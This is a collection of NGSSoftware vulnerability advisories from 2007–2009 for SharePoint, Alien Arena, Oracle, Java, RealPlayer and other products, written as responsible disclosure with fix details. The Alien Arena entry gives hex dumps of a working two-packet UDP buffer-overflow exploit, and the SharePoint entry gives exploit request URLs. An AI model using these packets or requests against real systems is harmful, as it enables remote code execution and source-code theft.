NGSSoftware advisories

Medium Risk Vulnerability in SharePoint Team Services

NGS — Mon, 26 Oct 2009 09:54:38 +0000

=======
Summary
=======
Name: SharePoint Team Services source code disclosure through download
facility
Release Date: 21 October 2009
Reference: NGS00532
Discover: Daniel Martin
Vendor: Microsoft
Vendor Reference:
Systems Affected: SharePoint Team Services 12.0.0.6219, 12.0.0.4518 and
possibly others
Risk: Medium
Status: Reported

========
TimeLine
========
Discovered: 17 September 2008
Released: 2 October 2008
Approved: 3 October 2008
Reported: 8 October 2008
Fixed:
Published: 23 October 2009

===========
Description
===========
Microsoft SharePoint is a browser-based collaboration and document
management platform. It can be used to host web sites that access shared
workspaces and documents, as well as specialized applications like wikis
and blogs from a browser.

It was found that the download facility of Microsoft SharePoint Team
Services can be abused to reveal the source code of ASP.NET files.

=================
Technical Details
=================
SharePoint Team Services stores a variety of files in its backend
database. These files include site templates, custom ASP.NET pages and
documents that users of the application upload to the document libraries.

Insufficient validation in the input parameters of the download facility
can result in the source code of ASP.NET files being disclosed. For
example, the source code of the default ASP.NET page available after
installing the product (http://server/Pages/Default.aspx) can be obtained
by issuing the following request:

http://server/_layouts/download.aspx?SourceUrl=/Pages/Default.aspx&Source=http://server/Pages/Default.aspx&FldUrl=

In order to retrieve the source code any file stored in the backend
database (files whose path does not start with /_layout/) it is sufficient
to craft a request that follows this pattern:

http://server/_layouts/download.aspx?SourceUrl=&Source=&FldUrl=

This bug can result in disclosure of sensitive information that can be
used by an attacker targeting the system. For instance the PublicKeyTokens
of the ASP.NET assemblies deployed in the server can be revealed enabling
an attacker to upload a malicious file that makes use of them.

===============
Fix Information
===============
It is advised that the source code of any bespoke ASP.NET file deployed in
the system is reviewed to ensure that no sensitive information would be
reviewed if an attacker abuses the download facility of the framework.
Additionally access on a need-to-know basis to SharePoint systems is
advised.

No workarounds exist at this point. However Microsoft has been contacted
so they can produce a fix for their customers. NGS has been advised that
although this issue will not be patched until the next release of
SharePoint, Microsoft has addressed the design issues around it in a
Knowledge Base article (KB976829) about security considerations when
running SharePoint that can be found at:

http://go.microsoft.com/fwlink/?LinkId=167936

NGS Software wants to thank the MSRC team and Charles Weidner in
particular for their support in clarifying this issue.

NGSSoftware Insight Security Research
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070

Very High Risk Vulnerability in Alien Arena 7.30

NGS — Wed, 21 Oct 2009 17:35:46 +0000

Anonymous Remote Arbitrary Code Execution in Alien Arena 7.30
————————————————————-

October 21st, 2009

A PDF version of this advisory can be found here.

=======
Summary
=======
Name: Anonymous Remote Arbitrary Code Execution in Alien Arena 7.30
Release Date: October 21st, 2009
Discoverer: Jason Geffner
Vendor: COR Entertainment
Systems Affected: Alien Arena 7.30
Risk: Very High
Status: Published

============
Introduction
============
This paper discusses how an anonymous remote attacker can execute arbitrary
code on the computers of Alien Arena’s networked players. This vulnerability
was responsibly disclosed to the authors of the game and this advisory was not
released until a fixed build of the game was released.

==========
Background
==========
Alien Arena is a popular[1] free open-source FPS game for Windows, Mac, and
Linux. It has had a history of security vulnerabilities[2] since its initial
release in 2004.

========
Timeline
========
06/19/09 Alien Arena 7.30 released
06/21/09 Anonymous remote arbitrary code execution vulnerability discovered
06/22/09 Request for contact sent to Alien Arena’s developers
06/23/09 Detailed vulnerability report responsibly disclosed to Lead Developer
of Alien Arena
06/23/09 Security vulnerability “fixed” (Revision 1390)[3]
06/23/09 Broken “fix” identified and responsibly disclosed to Lead Developer
of Alien Arena
06/23/09 Security vulnerability “fix” fixed (Revision 1391)[3]
10/08/09 Alien Arena 7.31 released, incorporating fixes above
10/16/09 Advisory written
10/21/09 Advisory released

=============
Vulnerability
=============
When the game client requests a list of network games to join, it sends a UDP
query to master.corservers.com. This server responds to the client via UDP with
a list of known game servers. The client then sends a UDP query to each of the
listed game servers, asking each for its description. The client’s parsing of
the servers’ responses is vulnerable to a buffer overflow attack.

The client is designed to listen for incoming UDP packets from
master.corservers.com and from the game servers on port 27901, however it will
accept and parse UDP packets from any IP address even if the client did not
initiate a UDP conversation with that given IP address. As such, an attacker
can send a malformed UDP packet from any source IP address; they need not know
a valid game server’s IP address to exploit this buffer overflow vulnerability.

When the client receives a UDP packet on port 27901 that specifies a server’s
description (the server-to-client “print” message), it calls the function
M_AddToServerList(…)in \client\menu.c to tokenize the rest of the UDP packet
(status_string):

| void M_AddToServerList (netadr_t adr, char *status_string)
| {
| char *rLine;
| char *token;
| char lasttoken[256];
| char seps[] = “\\”;
| …
| //parse it
|
| result = strlen(status_string);
|
| //server info - we may revisit this
| rLine = GetLine (&status_string, &result);
| …
| /* Establish string and get the first token: */
| token = strtok( rLine, seps );
| while( token != NULL ) {
| /* While there are tokens in “string” */
| if (!_stricmp (lasttoken, “admin”))
| …
| else if (!_stricmp (lasttoken, “website”))
| …
| else if (!_stricmp (lasttoken, “fraglimit”))
| …
| else if (!_stricmp (lasttoken, “timelimit”))
| …
| else if (!_stricmp (lasttoken, “version”))
| …
| else if (!_stricmp (lasttoken, “mapname”))
| …
| else if (!_stricmp (lasttoken, “hostname”))
| …
| else if (!_stricmp (lasttoken, “maxclients”))
| …
| /* Get next token: */
| strcpy (lasttoken, token);
| …

Note that the lasttoken buffer is 256 bytes long. As such, if an attacker
supplies a token longer than 256 bytes then the strcpy(…) function above will
overwrite the return address for the M_AddToServerList(…) function.

====================
Exploit, Step 1 of 2
====================
To properly orchestrate an attack and make it agnostic of the version of
Windows, an attacker would need to know a reliable return address that they can
use that satisfies the following conditions:
1. This address is constant across all versions of Windows.
2. The attacker can write code and data to this address.
3. Code at this address is readable and executable.

A global variable in Alien Arena’s executable would be ideal for this situation
since the Alien Arena developers did not link this executable for ASLR or DEP.
Since it’s a global variable and ASLR is disabled, the address will remain
constant across all versions of Windows for this version of Alien Arena, and
since DEP is not enabled, its content is executable.

When the client receives a UDP packet on port 27901 that specifies a list of
game servers (the server-to-client “servers” message), it calls the function
CL_ParseGetServersResponse() in \client\cl_main.c to parse the rest of the UDP
packet (net_message):

| void CL_ParseGetServersResponse()
| {
| …
| byte addr[4];
|
| MSG_BeginReading (&net_message);
| MSG_ReadLong (&net_message); // skip the -1
| …
| numServers = 0;
| …
| while( net_message.readcount +6 <= net_message.cursize ) {
| MSG_ReadData( &net_message, addr, 4 );
| servers[numServers].port = MSG_ReadShort( &net_message );
| ...

The following UDP data can be sent from any IP address to a client on port
27901 to store the “port” number 0xE4FF in the global variable servers[1].port,
which in Alien Arena 7.30 for Windows is located at the static address
0×05BE9734. (N.B., servers[0].port can’t be used because it is at static
address 0×05BE8F00 and the null-byte in this address can’t be used in the
“print” message).

00000000 FF FF FF FF 73 65 72 76 65 72 73 20 7F 00 00 01 ….servers ….
00000010 00 00 00 00 00 00 FF E4 ……..

Note that 0xFF 0xE4 is the machine code for “JMP ESP”. After sending the UDP
data above to the client, the attacker now knows that the assembly instruction
“JMP ESP” is located at static address 0×05BE9734.

====================
Exploit, Step 2 of 2
====================
The attacker could then send a UDP packet from any IP address to the client
consisting of the following data. This message overflows the strcpy(…)
function in M_AddToServerList(…) above and overwrites the return address with
the address of the “JMP ESP” instruction above (0×05BE9734). The highlighted
NOPs are the shellcode that gets executed. Note that those 4 NOPs can be
replaced with quite a bit of code — the data portion of the UDP packet can be
up to 2800 bytes, more than enough to do whatever an attacker would want to do.
The only restriction is no null-bytes, but that obviously wouldn’t be a problem
if an attacker used an encoded payload.

00000000 FF FF FF FF 70 72 69 6E 74 0A 5C 41 41 41 41 41 ….print.\AAAAA
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000050 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000070 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000080 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000090 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000100 41 41 41 41 41 41 41 41 41 41 41 34 97 BE 05 90 AAAAAAAAAAA4….
00000110 90 90 90 0A 20 41 20 41 …. A A

==========
Conclusion
==========
It is clear that a remote attacker can anonymously execute arbitrary code on
clients’ systems by sending 2 maliciously crafted UDP packets.

It should be noted that there are likely other vulnerabilities remaining in
this codebase. NGS did not perform a comprehensive security review of Alien
Arena.

============
Observations
============
Despite the common perception in the open-source community that “given enough
eyeballs, all bugs are shallow,”[4] open-source software is still plagued by
high-impact security vulnerabilities. For this mantra to hold, not only are
“enough eyeballs” required, but the eyeballs should be those of well-trained
security professionals.

Security best-practices such as adherence to the Security Development
Lifecycle[5] are also critical when designing and developing software. It is
worth noting that even with the code-based vulnerability identified in this
advisory, a defense-in-depth approach of using ASLR and/or DEP would have
deterred exploitation if enabled.

===============
Fix Information
===============
This issue has now been resolved. Alien Arena 7.31 can be downloaded from:
http://icculus.org/alienarena/rpa/aquire.html

==========
References
==========
[1] http://games.slashdot.org/story/09/06/21/1336213
[2] http://www.securityfocus.com/archive/1/426984
[3] http://icculus.org/alienarena/changelogs/7.31.txt
[4] http://en.wikipedia.org/wiki/Linus’_Law
[5] http://msdn.microsoft.com/en-us/library/ms995349.aspx

NGSSoftware Insight Security Research
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070

Critical Vulnerability in Apple Quicktime’s Indeo Codec

NGS — Mon, 15 Sep 2008 16:48:39 +0000

Paul Byrne of NGSSoftware has discovered a critical vulnerability in Apple Quicktime’s implementation of the Indeo Codec (CVE-ID: CVE-2008-3615) which may allow an attacker to execute arbitrary code on a user’s system via playing a malformed movie file in Quicktime containing video encoded in the Indeo Codec. This is also possible to be executed through the Quicktime Internet Explorer Active X control. It is in the Quicktime library for Indeo in the file “ir50_32.qtx” which was previously distributed through Apple’s website but written by a third party. The codec has now been removed and is no longer supported in the latest version of Quicktime.

This issue has been resolved in the newest version of Apple Quicktime 7.5.5, to see Apple’s release go to:

http://support.apple.com/kb/HT3027

NGSSoftware are going to withhold details of this flaw for three months. Full details will be published on the 14th December 2008. This three month window will allow other vendors the time needed to create patches in their versions of Indeo Codec before the details are released to the general public. This reflects NGSSoftware’s approach to responsible disclosure.

NGSSoftware Insight Security Research
Email: nisr@ngssoftware.com
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070

Critical Vulnerability in Oracle Application Server

NGS — Mon, 21 Jul 2008 05:55:30 +0000

NGSSoftware Insight Security Research Advisory

Name: PLSQL Injection in Oracle Application Server
Systems Affected: Oracle Application Server 9.0.4.3, 10.1.2.2, 10.1.4.1
Severity: Critical
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ davidl@ngssoftware.com ]
Reported: 9th October 2007
Date of Public Advisory: 15th July 2008
Advisory number: #NISR15072008
CVE: CVE-2008-2589

Overview
********
Oracle has just released a fix for a flaw that, when exploited, allows an
unauthenticated attacker on the Internet to gain full control of a backend
Oracle database server via the front end web server.

Details
*******
Oracle Application Server installs a number of PLSQL packages in the backend
database server. One of these is the WWV_RENDER_REPORT package and it is
vulnerable to PLSQL injection. This package uses definer rights execution
and therefore executes with the privileges of the owner, in this case the
highly privileged PORTAL user.

Specifically, the SHOW procedure takes as its 2nd argument the name of a
function to execute and this is embedded with a dynamically executed
anonymous block of PLSQL without first being sanitized. Because it is a
block of anonymous PLSQL, an attacker can exploit this flaw to run any SQL
statement, for example, create new users, grant dba privileges, delete or
modify data. This is achieved by wrapping the statement(s) within an
“execute immediate” statement and specifiying the autonomous_transaction
pragma.

Fix Information
***************
Oracle was alerted to this flaw on the 9th October 2007. A patch has now
been made available:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html

NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner
designed specifically for Oracle, can be used to accurately determine
whether your servers are vulnerable to these flaws. More information about
NGSSQuirreL for Oracle can be found here:

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php

About NGSSoftware
*****************
NGSSoftware develops vulnerability assessment and compliancy tools for
database servers including Oracle, Microsoft SQL Server, DB2, Sybase and
Informix. Headquartered in the United Kingdom NGS has offices in London, St.
Andrews (UK), Brisbane, and Perth (Australia) and Seattle in the United
States; NGSConsulting provide services to some of the largest and most
demanding organizations around the globe.

http://www.ngssoftware.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076

Critical Vulnerability in SNMPc

NGS — Wed, 30 Apr 2008 12:02:17 +0000

=======
Summary
=======
Name: Unauthenticated Stack Overflow in SNMPc
Release Date: 30 April 2008
Reference: NGS00526
Discover: Wade Alcorn (wade@ngssoftware.com) and John Heasman
(john@ngssoftware.com)
Vendor: Castle Rock Computing
Systems Affected: SNMPc versions 7.1 and earlier
Risk: Critical
Status: Published

===========
Description
===========
Wade Alcorn and John Heasman of NGSSoftware have discovered a stack
overflow vulnerability in Castle Rock Computing SNMPc Network Manager.
SNMPc Network Manger is a distributed network management system that
allows monitoring of the network infrastructure. It employs a
distributed polling agent architecture which uses SNMP TRAPs to provide
a solution capable of monitoring networks with up to ten thousand
devices. An SNMP TRAP initiated by a network element is sent to the
SNMPc Network Manager to allow monitoring of the infrastructure.

=================
Technical Details
=================
The vulnerability can be exploited when an overly long community string
is sent in the SNMP TRAP packet. The packets format will be valid ASN.1,
including the length of the community string. An attacker can craft a
single UDP packet that can lead to the execution of arbitrary code in
the context of LocalSystem.

===============
Fix Information
===============
NGSSoftware wish to note that Castle Rock Computing were extremely
pro-active in addressing this issue.

The latest version (SNMPc 7.1.1) can be downloaded from the Castle Rock
Computing website: http://www.castlerock.com/.

NGSSoftware Insight Security Research
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070

High Risk Vulnerability in Real Player (ID3 tags)

NGS — Tue, 30 Oct 2007 06:56:29 +0000

=======
Summary
=======
Name: Heap overflow in RealPlayer ID3 tag parsing code
Release Date: 29 October 2007
Reference: NGS00432
Discover: John Heasman
Vendor: RealNetworks
Systems Affected: Several builds of RealPlayer 10.5,
All builds of RealPlayer 10.
For additional affected versions, see the URL below.
Risk: High
Status: Published

========
TimeLine
========
Discovered: 1 August 2006
Released: 1 August 2006
Approved: 1 August 2006
Reported: 1 August 2006
Fixed: 25 October 2007
Published: 29 October 2007

===========
Description
===========
There is a heap overflow in the Realplayer code that parses ID3 tags in
MP3 files.

Impact: attackers could execute code of their choice on susceptible
systems if a user were induced to open a malicious MP3 file.

=================
Technical Details
=================
The problem stems from the parsing of a Lyrics3 v2.00 tag. The size of
the tag is calculated by reading 5 ASCII characters and calling
pncrt.atoi. A buffer is then allocated on the heap of size tag length +
1. Since atoi parses a signed integer, supplying -1, results in a zero
length allocation into which data is copied.

This can be exploited to overwrite a function pointer leading to the
execution of arbitrary attacker-supplied code in the context of the user
under which RealPlayer is running.

===============
Fix Information
===============
This issue has now been resolved. Steps detailing how to update RealPlayer may be obtained
from:

http://service.real.com/realplayer/security/10252007_player/en/

NGSSoftware Insight Security Research
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070

Medium Risk Vulnerability in Java Browser Plugin

NGS — Tue, 30 Oct 2007 06:52:38 +0000

=======
Summary
=======
Name: Untrusted Java applet can connect to localhost
Release Date: 29 October 2007
Reference: NGS00443
Discover: John Heasman
Vendor: Sun Microsystems
Systems Affected: JDK and JRE 6 Update 1 and earlier, JDK and JRE 5.0
Update 11 and earlier, SDK and JRE 1.4.2_14 and earlier
Risk: Medium
Status: Published

========
TimeLine
========
Discovered: 1 October 2006
Released: 2 October 2006
Approved: 7 October 2006
Reported: 1 November 2006
Fixed: 18 July 2007
Published: 29 October 2007

===========
Description
===========
The Java browser plugin shipped with versions of the JRE and JDK
listed above, contains a vulnerability that allows an
untrusted applet to violate the network access restrictions placed on it
by the Java sandbox in order to connect to the local host. This permits a
malicious website to host an applet that is capable of port scanning the
local system and exploiting vulnerable network services (e.g. unpatched
vulnerabilities in MSRPC etc.)

=================
Technical Details
=================
The Java browser plugin allows applets to be loaded from a remote location
most typically over HTTP/HTTPs but also over a number of other supported
protocols including an undocumented protocol scheme “verbatim”. Untrusted
applets are subject to network access restrictions documented at
http://java.sun.com/sfaq/:

“Applets are not allowed to open network connections to any computer,
except for the host that provided the .class files. This is either the
host where the html page came from, or the host specified in the codebase
parameter in the applet tag, with codebase taking precendence.”

By specifying a codebase URI prefixed by “verbatim:” it is possible to
load an applet from a remote location but have the browser plugin believe
it has been loaded from the local host. This allows an untrusted applet
to connect to and attempt to exploit network services running on the local
host. It should be noted that unlike binary sockets in Flash 9, an applet
can connect to any port, not just those greater than 1024.

At the time of reporting this issue, NGS provided Sun with a demonstration
applet that exploited MS06-040 (”Vulnerability in Server Service could
allow remote code execution”) on a vulnerable XP SP1 system.

===============
Fix Information
===============
This issue is addressed in the following releases (for Windows, Solaris,
and Linux):

JDK and JRE 6 Update 2 or later
JDK and JRE 5.0 Update 12 or later
SDK and JRE 1.4.2_15 or later

Further information is available at
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102995-1

NGSSoftware Insight Security Research
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070

High Risk Vulnerability in Java Virtual Machine (TTF)

NGS — Tue, 30 Oct 2007 06:47:00 +0000

=======
Summary
=======
Name: Memory overwrites in JVM via malformed TrueType font
Release Date: 29 October 2007
Reference: NGS00419
Discover: John Heasman
Vendor: Sun Microsystems
Systems Affected: JDK and JRE 5.0 Update 9 and earlier, SDK and JRE
1.4.2_14 and earlier
Risk: High
Status: Published

========
TimeLine
========
Discovered: 20 September 2006
Released: 20 September 2006
Approved: 20 September 2006
Reported: 1 November 2006
Fixed: 15 August 2007
Published: 29 October 2007

===========
Description
===========
It is possible to cause the Java Virtual Machine to overwrite an arbitrary
memory location with an arbitrary value (repeatedly and in a stable manner)
when parsing a malformed TrueType font.

Impact: By coercing a user to view a malicious web page, an attacker could
instantiate an applet that executes arbitrary native code inside the
browser.

=================
Technical Details
=================
From http://en.wikipedia.org/wiki/TrueType:

“TrueType systems include a virtual machine that executes programs inside
the font, processing the “hints” of the glyphs. These distort the control
points which define the outline, with the intention that the rasterizer
produces fewer undesirable features on the glyph. Each glyph’s hinting
program takes account of the size (in pixels) that the glyph is being
displayed at, as well as other less important factors of the display
environment.

Although incapable of receiving input and producing output as normally
understood in programming, the TrueType hinting language does offer the
other prerequisites of programming languages: conditional branching (IF
statements), looping an arbitrary number of times (FOR- and WHILE-type
statements), variables (although these are simply numbered slots in an
area of memory reserved by the font), and encapsulation of code into
functions. Special instructions called “delta hints” are the lowest level
control, moving a control point at just one pixel size.”

There are two instructions for writing values to the Control Value Table
(CVT) which holds global variables that can be used by multiple glyphs.
One of these functions does not perform sufficient validation on the
supplied index. This allows a font to write a scaled value relative to
the base of the dynamically allocated CVT. The scaling factor is based on
the requested size of the font - setting this to 32 results in a factor of
1.

In order to write to an arbitrary location the base of the CVT must first
be determined. The instruction to read from the CVT was also found not to
validate its index, so this can be used to read memory relative to the CVT
base. At an offset of -0×38 DWORDs there is a pointer to the end of the
CVT; this can be used to determine the CVT base. The end result is that an
arbitrary value can be written to an arbitrary value repeatedly. An
attacker can make use of the VM instructions to implement “pre-exploit”
logic that determines the browser, operating system and architecture
before deploying a chosen payload. This facilitates creation of a
cross-browser, cross-operating system, cross-architecture exploit.

===============
Fix Information
===============
This issue is addressed in the following releases (for Solaris, Linux, and
Windows):

JDK and JRE 5.0 Update 10 or later
SDK and JRE 1.4.2_15 or later

Further information is available at:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-103024-1

NGSSoftware Insight Security Research
http://www.ngssoftware.com/
http://www.databasesecurity.com/

http://www.nextgenss.com/

+44(0)208 401 0070

High Risk Vulnerability in Oracle XMLDB FTP Service

NGS — Wed, 17 Oct 2007 12:55:14 +0000

NGSSoftware Insight Security Research Advisory

Name: Oracle audit issue with XMLDB ftp service
Systems Affected: Oracle Oracle 9ir2, 10g Release 1
Severity: High
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ davidl@ngssoftware.com ]
Reported: 9th March 2006
Date of Public Advisory: 17th October 2007
Advisory number: #NISR17102007E

Description
***********
The Oracle XML DB ftp service contains problems with auditing logins.

Details
*******
When a user attempts to log in via the XDB ftp service the audit trail shows
an incorrect entry for USERID. This can present two subtle problems.
Firstly, if a user logs in as “SYSTEM” the USERID column only shows “SYSTE”
- only 5 characters. The second problem is that if the same user then
attempts to log in a user “FOO”, “FOOTE” is logged in the USERID column -
the “TE” coming from the “TE” of “SYSTE[M]” - the previous login. This only
happens on the same connected TCP circuit; as such all audit entries have
the same SESSIONID.

Fix Information
***************
Oracle was alerted to this flaw on the 9th of March 2006. A patch has now
been made available:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html

NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner
designed specifically for Oracle, can be used to accurately determine
whether your servers is vulnerable to this flaw. More information about
NGSSQuirreL for Oracle can be found here:

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php

About NGSSoftware
*****************
NGSSoftware develops vulnerability assessment and compliancy tools for
database servers including Oracle, Microsoft SQL Server, DB2, Sybase and
Informix. Headquartered in the United Kingdom NGS has offices in London,
St. Andrews (UK), Brisbane, and Perth (Australia) and seattle in the United
States; NGSConsulting provide services to some of the largest and most
demanding organizations around the globe.
http://www.ngssoftware.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076
enquiries@ngssoftware.com

High Risk Vulnerability in Oracle TNS Listener

NGS — Wed, 17 Oct 2007 12:51:12 +0000

NGSSoftware Insight Security Research Advisory

Name: Oracle TNS Listener DoS and/or remote memory inspection
Systems Affected: Oracle 8.1.7.4, 10g Release 2 and 1, Oracle 9
Severity: High
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ davidl@ngssoftware.com ]
Reported: 22nd June 2006
Date of Public Advisory: 17th October 2007
Advisory number: #NISR17102007C

Description
***********
The TNS Listener can be crashed by an attacker causing a Denial of Service;
alternatively the attacker can use the same flaw to expose memory contents
remotely. This may reveal sensitive information.

Details
*******
There is a bug in GIOP service that can allow an attacker to crash the TNS
Listener and/or dump memory. A DWORD in the connect GIOP packet is trusted
as the size of the data in the packet. By setting this to a large value
(e.g. 0×1FFFF) causes the listener to allocate this much memory then attempt
to copy this much data to it - which eventually leads to a read access
violation because the source data is less than this number and the process
lands in uninitialized memory. If the attacker uses a smaller number, e.g.
0xFFFF they can dump this many bytes from memory. This may reveal sensitive
information such as the TNS Listener password.

Fix Information
***************
Oracle was alerted to this flaw on the 22nd of June 2006. A patch has now
been made available:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php

About NGSSoftware
*****************
NGSSoftware develops vulnerability assessment and compliancy tools for
database servers including Oracle, Microsoft SQL Server, DB2, Sybase and
Informix. Headquartered in the United Kingdom NGS has offices in London,
St. Andrews (UK), Brisbane, and Perth (Australia) and seattle in the United
States; NGSConsulting provide services to some of the largest and most
demanding organizations around the globe.
http://www.ngssoftware.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076
enquiries@ngssoftware.com